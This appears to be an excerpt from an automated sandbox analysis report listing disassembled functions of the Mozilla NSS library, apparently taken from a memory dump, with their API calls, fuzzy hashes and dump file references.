                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Alloc_Arena$Arena_FindTag_memset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3594443183-0
                                                                                                                                                                                                                                                            • Opcode ID: c9b50c59313d90ced4bfdab445551a94681084fd8bc0bc8402f22e268afc0cce
                                                                                                                                                                                                                                                            • Instruction ID: 5415450653770afed0ce2cb3ff31e94a97ca3253cea3d4704fc7d60a6d736b9c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9b50c59313d90ced4bfdab445551a94681084fd8bc0bc8402f22e268afc0cce
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C31CAB7A002215BEB008B66DC45F5AB7A9AF84794F094479EC08CB361EB79DA01C7D1
                                                                                                                                                                                                                                                            Function 6BEE6B70 Relevance: 9.1, APIs: 6, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PK11_Authenticate.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BEE6BA9
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE9520: PK11_IsLoggedIn.NSS3(00000000,?,6BF1379E,?,00000001,?), ref: 6BEE9542
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BEE6BC0
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BEE6BD7
                                                                                                                                                                                                                                                            • PK11_HasAttributeSet.NSS3(?,?,00000002,00000000,?,?,?,?,00000007,?,00000000), ref: 6BEE6B97
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01870: TlsGetValue.KERNEL32 ref: 6BF018A6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01870: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6BEE6C34,?,?,00000001,00000000,00000007,?), ref: 6BF018B6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01870: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6BEE6C34,?,?), ref: 6BF018E1
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01870: PR_SetError.NSS3(00000000,00000000), ref: 6BF018F9
                                                                                                                                                                                                                                                            • PK11_HasAttributeSet.NSS3(?,?,00000001,00000000,00000007,?,00000000), ref: 6BEE6C2F
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BEE6C61
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: K11_$Util$Arena_Attribute$Alloc_ArenaAuthenticateCriticalEnterErrorFreeLoggedSectionUnlockValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2313852964-0
                                                                                                                                                                                                                                                            • Opcode ID: e6e355f1c7780f660d1aa2c86da6bac86eb22beb7a6f5b76e9813073c3da4f0f
                                                                                                                                                                                                                                                            • Instruction ID: 694b65f5adbc36a33d70c8b65ebc5bb5440880636d20cc560140b31bd86e9396
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6e355f1c7780f660d1aa2c86da6bac86eb22beb7a6f5b76e9813073c3da4f0f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD3127B2A403019FE7108F64DC81F6A77A4EF45758F100069FE1897392E779D95286F2
                                                                                                                                                                                                                                                            Function 6BEAA9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,00000000,?,?,6BF89270), ref: 6BEAA9BF
                                                                                                                                                                                                                                                            • PR_IntervalToMilliseconds.NSS3(?,?,6BF89270), ref: 6BEAA9DE
                                                                                                                                                                                                                                                              • Part of subcall function 6BEAAB40: __aulldiv.LIBCMT ref: 6BEAAB66
                                                                                                                                                                                                                                                              • Part of subcall function 6BF8CA40: LeaveCriticalSection.KERNEL32(?), ref: 6BF8CAAB
                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6BEAAA2C
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,-00000001), ref: 6BEAAA39
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BEAAA42
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BEAAAEB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4008047719-0
                                                                                                                                                                                                                                                            • Opcode ID: d8296bb8e6fd2dbbc939ff376d19bdcb0ff289b15ac9ac4797182cec7bb84c4d
                                                                                                                                                                                                                                                            • Instruction ID: 990d8853026546aeb68bca3601a6278f6cd6621f41e0cf61735d24ee95e5fb13
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8296bb8e6fd2dbbc939ff376d19bdcb0ff289b15ac9ac4797182cec7bb84c4d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4415D706447018FD7109F28C584796BBF9FB46318F24966DE4698B341DB79D982CB80
                                                                                                                                                                                                                                                            Function 6BED88D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6BEE0725,00000000,00000058), ref: 6BED8906
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BED891A
                                                                                                                                                                                                                                                            • PL_ArenaAllocate.NSS3(?,?), ref: 6BED894A
                                                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,6BEE072D,00000000,00000000,00000000,?,6BEE0725,00000000,00000058), ref: 6BED8959
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6BED8993
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BED89AF
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1716546843-0
                                                                                                                                                                                                                                                            • Opcode ID: ec92b1c1f4e99389b38ebe3aff8478a06d97d4411d5fa7b0ba793becd67f11da
                                                                                                                                                                                                                                                            • Instruction ID: 596cc955a65ff1741ffc71b5861cfd7a54d95da029808bb174715e29a2b8b063
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec92b1c1f4e99389b38ebe3aff8478a06d97d4411d5fa7b0ba793becd67f11da
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21312576A00211ABD7009F28CC41B19B7A4AF0575CF259664EC5C97341E776E852C7D2
                                                                                                                                                                                                                                                            Function 6BEC1BF0 Relevance: 9.1, APIs: 6, Instructions: 94threadmemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BEC1C0C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6BEC1C20
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6BEC1C37
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6BEC1C76
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6BEC1CB1
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BEC1CDE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Arena_CurrentThread$Alloc_ArenaErrorFreeValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2304596573-0
                                                                                                                                                                                                                                                            • Opcode ID: 9d5640a65a64047ac5af3fb7567be9bca082c7a784147850f5c80293ece743cb
                                                                                                                                                                                                                                                            • Instruction ID: ca8616e8193ebbb3defbe935666511802e3a4b45c71977700d4146c3662dffb5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d5640a65a64047ac5af3fb7567be9bca082c7a784147850f5c80293ece743cb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C021D4B2904226ABEB149FF59E41E6B3668EF14248F104154FD2896362F739C960C7A3
                                                                                                                                                                                                                                                            Function 6BFD8A50 Relevance: 9.1, APIs: 6, Instructions: 84networkthreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • htons.WSOCK32(?), ref: 6BFD8A8F
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB0F00: PR_GetPageSize.NSS3(6BEB0936,FFFFE8AE,?,6BE416B7,00000000,?,6BEB0936,00000000,?,6BE4204A), ref: 6BEB0F1B
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB0F00: PR_NewLogModule.NSS3(clock,6BEB0936,FFFFE8AE,?,6BE416B7,00000000,?,6BEB0936,00000000,?,6BE4204A), ref: 6BEB0F25
                                                                                                                                                                                                                                                            • htons.WSOCK32(?), ref: 6BFD8ACB
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?), ref: 6BFD8AE2
                                                                                                                                                                                                                                                            • htons.WSOCK32(?), ref: 6BFD8B1E
                                                                                                                                                                                                                                                            • htonl.WSOCK32(7F000001,?), ref: 6BFD8B3B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: htons$CurrentModulePageSizeThreadhtonl
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3860140138-0
                                                                                                                                                                                                                                                            • Opcode ID: c6090b2923112c317b0ea709d776ec625fbf7f8c5b8a43af2fea109e29b10478
                                                                                                                                                                                                                                                            • Instruction ID: 00ef99a72afc574cb957d34a3c3d8d4cc44d6511b45834e246297ee3b8c59112
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6090b2923112c317b0ea709d776ec625fbf7f8c5b8a43af2fea109e29b10478
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7721C0B3D24741AAC7209F388981536B3F5AF95708B15EB1EE8D987130F738A1C0C354
                                                                                                                                                                                                                                                            Function 6BF20AA0 Relevance: 9.1, APIs: 6, Instructions: 79COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PL_HashTableDestroy.NSS3(?,?,?,6BED7F62,00000000,00000000,?,?,?,6BED80DD), ref: 6BF20AAE
                                                                                                                                                                                                                                                            • PL_HashTableDestroy.NSS3(?,?,?,6BED7F62,00000000,00000000,?,?,?,6BED80DD), ref: 6BF20ACA
                                                                                                                                                                                                                                                            • PL_HashTableDestroy.NSS3(?,?,?,6BED7F62,00000000,00000000,?,?,?,6BED80DD), ref: 6BF20B05
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000,?,?,6BED7F62,00000000,00000000,?,?,?,6BED80DD), ref: 6BF20B24
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,6BED7F62,00000000,00000000,?,?,?,6BED80DD), ref: 6BF20B3C
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(6C0224E4,00000000,000005B0,?,?,6BED7F62,00000000,00000000,?,?,?,6BED80DD), ref: 6BF20BC2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DestroyHashTable$Arena_FreeUtilfreememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4033302747-0
                                                                                                                                                                                                                                                            • Opcode ID: 383aa4788320fded324ac6ee7d3671eaace4253cb419242880385c472c748c0c
                                                                                                                                                                                                                                                            • Instruction ID: 0f3a3a321382d61f9807b42d67c4353774ae8b06aeb02f9793668fc4faaef02f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 383aa4788320fded324ac6ee7d3671eaace4253cb419242880385c472c748c0c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D421EAF6B202019FEF20DBF5D81EB023BB8A716768F614425D409D6651EB7DA144CB51
                                                                                                                                                                                                                                                            Function 6BF18A60 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(6BEC61C4,?,6BEC5F9C,00000000), ref: 6BF18A81
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6BEC5F9C,00000000), ref: 6BF18A9E
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6BEC5F9C,00000000), ref: 6BF18AB7
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6BEC5F9C,00000000), ref: 6BF18AD2
                                                                                                                                                                                                                                                            • PR_NotifyCondVar.NSS3(?,?,?,?,?,6BEC5F9C,00000000), ref: 6BF18B05
                                                                                                                                                                                                                                                            • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,6BEC5F9C,00000000), ref: 6BF18B18
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CondNotifyValue$CriticalEnterSectionUnlock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1007705821-0
                                                                                                                                                                                                                                                            • Opcode ID: ad85b18074e6d5baea513f7bfad86848a9f8e50197cb6f80976b12fb13ad1918
                                                                                                                                                                                                                                                            • Instruction ID: 5f00e5111c0cc6916e7e56144757ae2a0c3e40281f890d79138b60f28e08d580
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad85b18074e6d5baea513f7bfad86848a9f8e50197cb6f80976b12fb13ad1918
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A219FB2908704DFDB10AF38C245619F7F4FF05348F144E69D89587621EB38E884CB92
                                                                                                                                                                                                                                                            Function 6BF59B50 Relevance: 9.1, APIs: 6, Instructions: 70memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3 ref: 6BF59B73
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: calloc.MOZGLUE ref: 6BF20D50
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: TlsGetValue.KERNEL32 ref: 6BF20D6D
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3 ref: 6BF59B96
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(6BF4847D,?), ref: 6BF59BC2
                                                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3 ref: 6BF59BF3
                                                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3 ref: 6BF59BFE
                                                                                                                                                                                                                                                            • free.MOZGLUE ref: 6BF59C06
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Alloc_DestroyUtilValue$PrivatePubliccallocfree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 534788125-0
                                                                                                                                                                                                                                                            • Opcode ID: 15bfa59e8a514bcb60a947e468808eda1e4f38ad39674213f13f5acc0b746a55
                                                                                                                                                                                                                                                            • Instruction ID: 2543aff85edea6eb8071e7fe24dea1c415f761749af7f5ed51ddc6616b7052e6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15bfa59e8a514bcb60a947e468808eda1e4f38ad39674213f13f5acc0b746a55
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2221ACB3904301DFEB04AF78C585759BBE4FF15344F0185AAD89887262DB7CD5A0CB91
                                                                                                                                                                                                                                                            Function 6BED89E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6BED88AE,-00000008), ref: 6BED8A04
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BED8A15
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(6BED88AE,00000000,00000132), ref: 6BED8A27
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BED8A35
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(6BED88AE,00000000,00000132,00000000,-00000008,00000000,?,?,6BED88AE,-00000008), ref: 6BED8A45
                                                                                                                                                                                                                                                            • free.MOZGLUE(6BED88A6,?,6BED88AE,-00000008), ref: 6BED8A4E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
